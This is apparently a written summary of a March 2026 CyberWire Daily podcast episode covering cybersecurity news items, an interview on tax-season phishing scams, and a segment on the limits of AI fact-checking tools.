CyberWire Daily – “Signals, scams, and a Salesforce snatch.”
Date: March 10, 2026
Host: Dave Bittner (N2K Networks)
Guest: Brian Baskin (Sublime Security)
Episode Overview
This episode delivers a rapid-fire roundup of the latest cybersecurity threats, defenses, and regulatory shifts affecting organizations and individuals. Major stories span Russian state hackers targeting messaging apps, phishing campaigns exploiting local government systems, lawsuits over Pentagon AI blacklists, techniques in Salesforce data theft, new malware targeting macOS, AWS credential phishing, and the latest in enterprise vulnerability management. The episode also features an in-depth interview with Brian Baskin, threat researcher at Sublime Security, focusing on tax-season scams and the evolution of phishing attacks using AI. It wraps up by examining the pitfalls of AI-powered “fact checkers.”
Key Discussion Points
1. Russian Hackers Target Messaging Apps ([00:47])
- Summary: Russian state hackers are actively trying to compromise Signal and WhatsApp accounts belonging to government officials, military staff, and journalists, including Dutch government employees.
- Methods:
- Social engineering: Impersonating Signal support chatbots to solicit verification or PIN codes.
- Exploiting legitimate app features, such as linking attacker-controlled devices to victim accounts.
- Notable Quote:
"Dutch authorities stress that the messaging platforms themselves remain secure, but individual accounts are vulnerable."
(Dave Bittner, 01:30) - Advice: Remain vigilant for suspicious activity, and report issues to organizational security teams.
2. Permit Scammers Impersonate Local Officials ([02:01])
- Summary: Cybercriminals are impersonating US city and county officials to dupe individuals applying for land use permits, leveraging real permit details to increase legitimacy.
- Tactics:
- Fraudulent emails from non-government domains.
- Pressured payments via wire transfer, peer-to-peer apps, or cryptocurrency.
- FBI Recommendations:
Verify sender domains, contact local government directly, and report incidents to the Internet Crime Complaint Center.
3. Anthropic’s Lawsuit Over Pentagon Blacklist ([03:01])
- Summary: Following Pentagon’s designation of Anthropic as a supply chain risk (banning its Claude AI from defense work), the company is suing to overturn the decision.
- Impact:
- “Anthropic estimates the decision could jeopardize hundreds of millions of dollars in the near term and potentially reduce its 2026 revenue by billions.”
(Dave Bittner, 03:50)
- “Anthropic estimates the decision could jeopardize hundreds of millions of dollars in the near term and potentially reduce its 2026 revenue by billions.”
- Request: Anthropic seeks a judicial pause on policy and a formal review.
4. White House Moves on Cybercrime & Victim Restitution ([04:30])
- Summary: The Trump administration has issued an executive order ramping up the government’s fight against cybercrime, focusing on dismantling transnational scam centers and setting up victim restitution.
- Key Actions:
- Coordinated agencies’ effort within 120 days.
- Creation of a restitution program to return seized funds to victims in 90 days.
- New operational units and intelligence sharing.
5. Salesforce “Shiny Hunters” Data Theft ([05:41])
- Summary: Salesforce reports a widespread breach campaign linked to the Shiny Hunters group, exploiting misconfigured Experience Cloud Guest user settings, not platform vulnerabilities.
- Attack Tools:
- Modified AURA inspector tool for data extraction.
- Threats: Extortion demands and data leak threats to hundreds of potential victims.
6. Ericsson Breach ([06:30])
- Summary: A breach at a third-party provider exposed personal data of over 15,000 Ericsson employees and customers.
- Details:
Potentially exposed information includes social security numbers, financial and medical data, though no misuse reported yet.
7. macOS ClickFix/Shub Stealer Malware ([07:22])
- Summary: New social engineering attack targets Mac users via a fake CleanMyMac website, using the ClickFix technique to bypass protections.
- Attack Flow:
Victims voluntarily run malicious terminal commands, installing malware that steals system, authentication, and cryptocurrency wallet information.
8. AWS Credential Phishing via Adversary-in-the-Middle ([08:16])
- Summary: Attackers use typo-squatted domains and real-time authentication proxies to phish AWS Console credentials.
- Timeline:
Account compromise observed within 20 minutes of credential capture (using Mullvad VPN addresses).
9. Ivanti Vulnerability – CISA Alert ([09:26])
- Summary: CISA warns of an actively exploited Ivanti Endpoint Manager flaw (authentication bypass/Cross-Site Scripting), with a federal mandate to patch within three weeks.
- Risk: “Significant risks to federal networks” – defenders urged to patch immediately.
Interview Spotlight: Brian Baskin on Tax Season Employee Impersonation Scams ([14:37–20:15])
The Tax Season Scam Landscape
- Motivation & Tactics:
“Tax season … is a great time for actors to come in, target people with … very targeted unique attacks. … It really preys upon people's fears and urgency.”
(Brian Baskin, 14:37)- Criminals capitalize on deadline panic and trust in government communications.
- Attackers don’t even need to invent urgency—the IRS and tax deadlines do it for them.
Types of Scams Observed ([16:07])
- Impersonation Attacks:
- Pretending to be the IRS, requesting personal info, “updated” forms or W2s.
- Delivery Methods:
- Malicious attachments (e.g., PDFs)
- Fake websites, phishing forms.
- Two Target Audiences:
“One is … your more consumer-level person … typically smaller amounts of money, … versus your more enterprise-level person … in charge of tens of thousands of dollars [and] get the much more complicated and sophisticated attacks.”
(Brian Baskin, 17:05)
Defending the Organization ([17:44–19:55])
- Phishing Is More Convincing Than Ever:
- Advances in AI enable nearly flawless language in phishing emails.
- Classic signals of scam emails (bad grammar, spelling mistakes) are no longer reliable.
- “Modern phishing is actually operationally mature. We moved away from the sloppy attacks.”
- Key User Advice:
- Scrutinize destination URLs, QR codes, callback numbers.
- Cross-check official contacts via independent search.
- Organization Defenses:
- Strong email security tools.
- Multi-factor authentication for sensitive portals (like HR).
- Rigid internal policies for financial requests (e.g., layered approvals).
- Staff Education:
“A real educational component here [is] making your employees aware of these things.”
(Dave Bittner, 19:12)
AI and Fact-Checking: Who Watches the Watchers? ([21:54])
- Insight by Dorsof Salemi (University of Montreal):
- AI-based fake news detectors do not truly verify facts. They identify patterns based on (sometimes biased) training data.
- Key Problem:
“Instead, they calculate probabilities … behave less like journalists and more like mirrors, reflecting … biases and gaps … in the data.”
(Dave Bittner, 21:59) - Risks: Biases and non-transparent definitions of misinformation.
- Proposed Solution:
Human-centered tools that show sources and explanations, keeping judgment with the user—not the algorithm.
Notable Quotes & Memorable Moments
-
On tax phishing sophistication:
“Modern phishing is actually operationally mature. ... They're using legitimate services, legitimate emails. So the real protection comes from knowing where that email is leading you.”
(Brian Baskin, 18:38) -
On urgency and human fallibility:
“The IRS has really put the fear out there ... a lot of people fear that if they don’t [file by the deadline], big, horrible things were going to happen ... but the IRS doesn’t actually happen that fast.”
(Brian Baskin, 15:21) -
On AI fact-checkers:
“Those promises are doing a bit of exaggerating themselves. … [AI fact checkers] behave less like journalists and more like mirrors.”
(Dave Bittner, 21:54)
Timestamps for Key Segments
- 00:47: Russian hackers target Signal/WhatsApp
- 02:01: Permit phishing campaign
- 03:01: Anthropic sues Pentagon
- 04:30: White House anti-cybercrime order
- 05:41: Salesforce/Shiny Hunters campaign
- 06:30: Ericsson third-party breach
- 07:22: macOS ClickFix/Shub Stealer campaign
- 08:16: AWS adversary-in-the-middle phishing
- 09:26: CISA/Avanti high-risk vulnerability
- 14:37–20:15: Brian Baskin interview – tax season scams
- 21:54: AI fact-checking limitations
Conclusion
This episode underscores a crucial theme: attack sophistication is rising, driven by improved social engineering and AI, even as organizations race to defend themselves with both technology and policy. From government agencies to global enterprises and individual taxpayers, the threat landscape is increasingly relentless—and demands vigilance, layered defenses, and critical thinking, especially in the age of AI-fueled misinformation.
For more details, visit theCyberWire.com and check out the daily briefing for source links.